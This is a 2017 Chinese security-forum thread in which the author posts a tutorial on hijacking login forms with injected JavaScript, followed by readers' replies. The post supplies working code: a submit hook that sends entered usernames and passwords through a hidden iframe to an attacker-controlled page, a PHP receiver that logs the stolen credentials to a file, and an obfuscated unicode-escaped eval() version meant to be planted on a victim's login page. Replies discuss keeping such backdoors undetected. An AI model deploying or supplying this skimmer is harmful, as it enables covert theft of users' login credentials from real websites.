用户
搜索
  • TA的每日心情
    开心
    11 小时前
  • 签到天数: 293 天

    连续签到: 22 天

    [LV.8]以坛为家I

    i春秋签约作家

    春秋闷骚男

    Rank: 7Rank: 7Rank: 7

    24

    主题

    410

    帖子

    495

    魔法币
    收听
    0
    粉丝
    14
    注册时间
    2016-7-21

    i春秋签约作者

    发表于 2017-5-16 16:23:07 219730
    本帖最后由 风在指尖 于 2017-8-31 02:30 编辑

    试验开始 javascript表单劫持

    其实应该可以留有很多后门,但是我暂时只想到这一种,还希望社区的大神能够完善这篇文章·~~~~

    原理:在正常的登陆页面,留下一段恶意JS代码,在登陆账号密码的同时,也会把账号密码悄悄的发送到我们的站点上~~~

    test.html 正常页面

    test2.php 用来验证账号密码数据的正常页面

    test3.php 攻击站点用来接收账号密码的页面

    http://127.0.0.1  你自己的攻击站



    正常页面 Test.html




    原始的界面,自己简化了,代码内容如下
    [AppleScript] 纯文本查看 复制代码
     
    
      <form action="test2.php" method="POST" id="form">
    
        <input type="text" name="user">
    
        <input type="password" name="pass">
    
        <input type="submit">
    
      </form>

    一般的情况下输入密码,数据提交给test2.php,很正常的一个页面~~

    现在我们要在test.html里插入一段代码,用JS动态的创建一个iframe,包含表单里账号密码的值,把表单里的值发送到test3.php(我们的恶意接收站点)里

    代码如下

    [AppleScript] 纯文本查看 复制代码
    <script>
    
        form=document.getElementById('form');   //获取form表单
    
        form.onsubmit=function(){
    
          var iframe=document.createElement("iframe"); //创建一个iframe 内联框架
    
          iframe.style.display="none";   //设置内联框架为隐藏模式
    
          alert(form.user.value);    //弹出表单里的账号的值
    
          alert(form.pass.value);    //弹出表单里密码的值
    
          iframe.src="http://127.0.0.1/test3.php?user="+form.user.value+"=username    "+form.pass.value+"=pass";           //对我们的站点发送GET请求,请求中附带着账号密码的数据
    
          document.body.appendChild(iframe);  
    
        }
    
      </script>





    现在来编写你用来接收账号密码的test3.php 页面的代码

    [AppleScript] 纯文本查看 复制代码
    <?php
    
     $fp=fopen("user.txt", "a+");   //创建一个user.txt文本
    
     $referer="referer=".$_SERVER['HTTP_REFERER']."   ";   //查看账号密码是从哪个地方发来的
    
     @$user=$_GET['user'];   //接收GET请求的账号
    
      @$pass=$_GET['pass'];  //接收GET请求的密码
    
    
     fwrite( $fp, $referer);   //将referer 写入到文本里
    
      fwrite( $fp, $user);   //将账号 写入到文本里
    
     fwrite( $fp, $pass);     //将密码写入到文本里
    
      fwrite( $fp, "\r\n");     //每次写完换行
    
    ?>
    
     


    现在我们点击提交试试




    账号 123456密码 qwerty


    账号弹出


    密码弹窗

    账号和密码就被保存在我们的攻击站点



    内容分别是:来源URL发送给我们的数据        账号        密码 只要我们把这段代码放到对方的登陆页面,无论他修改什么密码,我们都可以收到他们的密码·~这段代码稍微有点经验人,就能看出端倪,那么~~~ 可以尝试对他进行编码,转码,或者隐藏起来

    左边的代码不能有空格

    最后的代码就是
    [AppleScript] 纯文本查看 复制代码
     eval("\u0066\u006f\u0072\u006d\u003d\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0067\u0065\u0074\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0042\u0079\u0049\u0064\u0028\u0027\u0066\u006f\u0072\u006d\u0027\u0029\u003b\u0066\u006f\u0072\u006d\u002e\u006f\u006e\u0073\u0075\u0062\u006d\u0069\u0074\u003d\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0028\u0029\u007b\u0076\u0061\u0072\u0020\u0069\u0066\u0072\u0061\u006d\u0065\u003d\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0028\u0022\u0069\u0066\u0072\u0061\u006d\u0065\u0022\u0029\u003b\u0069\u0066\u0072\u0061\u006d\u0065\u002e\u0073\u0074\u0079\u006c\u0065\u002e\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003d\u0022\u006e\u006f\u006e\u0065\u0022\u003b\u0061\u006c\u0065\u0072\u0074\u0028\u0066\u006f\u0072\u006d\u002e\u0075\u0073\u0065\u0072\u002e\u0076\u0061\u006c\u0075\u0065\u0029\u003b\u0061\u006c\u0065\u0072\u0074\u0028\u0066\u006f\u0072\u006d\u002e\u0070\u0061\u0073\u0073\u002e\u0076\u0061\u006c\u0075\u0065\u0029\u003b\u0069\u0066\u0072\u0061\u006d\u0065\u002e\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0031\u0032\u0037\u002e\u0030\u002e\u0030\u002e\u0031\u002f\u0074\u0065\u0073\u0074\u0033\u002e\u0070\u0068\u0070\u003f\u0075\u0073\u0065\u0072\u003d\u0022\u002b\u0066\u006f\u0072\u006d\u002e\u0075\u0073\u0065\u0072\u002e\u0076\u0061\u006c\u0075\u0065\u002b\u0022\u003d\u0075\u0073\u0065\u0072\u006e\u0061\u006d\u0065\u0020\u0020\u0020\u0020\u0022\u002b\u0066\u006f\u0072\u006d\u002e\u0070\u0061\u0073\u0073\u002e\u0076\u0061\u006c\u0075\u0065\u002b\u0022\u003d\u0070\u0061\u0073\u0073\u0022\u003b\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0043\u0068\u0069\u006c\u0064\u0028\u0069\u0066\u0072\u0061\u006d\u0065\u0029\u003b\u007d")
    
     

    转换后的代码,把这个代码放到对方任何位置都行,或者外部引用的JS代码,放到登陆页面,就能无限的接收密码了



    xss  交流群602221356

    评分

    参与人数 1魔法币 +3 收起 理由
    xiaohua114 + 3

    查看全部评分

    本帖被以下淘专辑推荐:

    xss  交流群602221356  接收XSS爱好者
    yyyxy 管理员 六国战旗移动展示平台! 秦 楚 燕 魏 齐 赵
    来自 16#
    发表于 2017-5-19 14:05:33
    文章奖励介绍及评分标准:http://bbs.ichunqiu.com/thread-7869-1-1.html,如有疑问请加QQ:286894635!

    奖金
    点评
    50
    思路不错,可惜较为简短。

    欢迎加入i春秋QQ群大家庭,每人只能任选加入一个群哦!投稿请加我QQ:286894635。
    i春秋-楚:533191896
    i春秋-燕:129821314
    i春秋-齐:417360103
    i春秋-秦:262108018
    使用道具 举报 回复
    风在指尖 发表于 2017-5-17 09:45
    读完了,被发现了,人家做了各种安全措施,请问你怎么留不报读的的长期后门~ ...

    我宁愿在服务器上的test2.php上面 加个file_get_contents  也不愿意在本地页面加这段JS.....
    使用道具 举报 回复
    发表于 2017-5-17 09:45:16
    萧然 发表于 2017-5-17 08:49
    都有篡改网页文件的权限了,为什么不直接从数据库里读出他的账号密码呢?? ...

    读完了,被发现了,人家做了各种安全措施,请问你怎么留不报读的的长期后门~
    xss  交流群602221356  接收XSS爱好者
    使用道具 举报 回复
    发表于 2017-5-22 22:21:55
    yanlong 发表于 2017-5-22 13:25
    登录页面弹出帐号密码,那不是管理员登录时弹出了 人家不发现   ?

    晕~~我弹窗只是证明能够弹出密码, 可以吧alert删掉不就行了~~
    xss  交流群602221356  接收XSS爱好者
    使用道具 举报 回复
    发表于 2017-5-17 10:49:09
    萧然 发表于 2017-5-17 10:46
    我宁愿在服务器上的test2.php上面 加个file_get_contents  也不愿意在本地页面加这段JS..... ...

    到了真实环境你自己比比就知道了
    xss  交流群602221356  接收XSS爱好者
    使用道具 举报 回复
    发表于 2017-5-19 14:26:16
    yyyxy 发表于 2017-5-19 14:05
    文章奖励介绍及评分标准:http://bbs.ichunqiu.com/thread-7869-1-1.html,如有疑问请加QQ:286894635!

    下次写长一些~写详细点
    xss  交流群602221356  接收XSS爱好者
    使用道具 举报 回复
    发表于 2017-5-16 16:33:38
    666666
    使用道具 举报 回复
    发表于 2017-5-16 16:35:28
    xss  交流群602221356  接收XSS爱好者
    使用道具 举报 回复
    发表于 2017-5-16 16:40:16

    小例子说明大问题
    使用道具 举报 回复
    发表于 2017-5-17 08:49:08
    都有篡改网页文件的权限了,为什么不直接从数据库里读出他的账号密码呢??
    使用道具 举报 回复
    厲害了,我的哥
    使用道具 举报 回复
    发表于 2017-5-17 11:54:11

    其实还有很多不足的地方~
    xss  交流群602221356  接收XSS爱好者
    使用道具 举报 回复
    发表于 2017-5-17 11:56:55

    不过多谢支持·~~
    xss  交流群602221356  接收XSS爱好者
    使用道具 举报 回复
    发表于 2017-5-17 12:45:57
    使用道具 举报 回复
    发表于 2017-5-17 13:48:35
    xss  交流群602221356  接收XSS爱好者
    使用道具 举报 回复
    发表于 2017-5-17 23:25:48
    谢谢分享         
    使用道具 举报 回复
    发表于 2017-5-18 08:20:52

    不客气
    xss  交流群602221356  接收XSS爱好者
    使用道具 举报 回复
    12下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册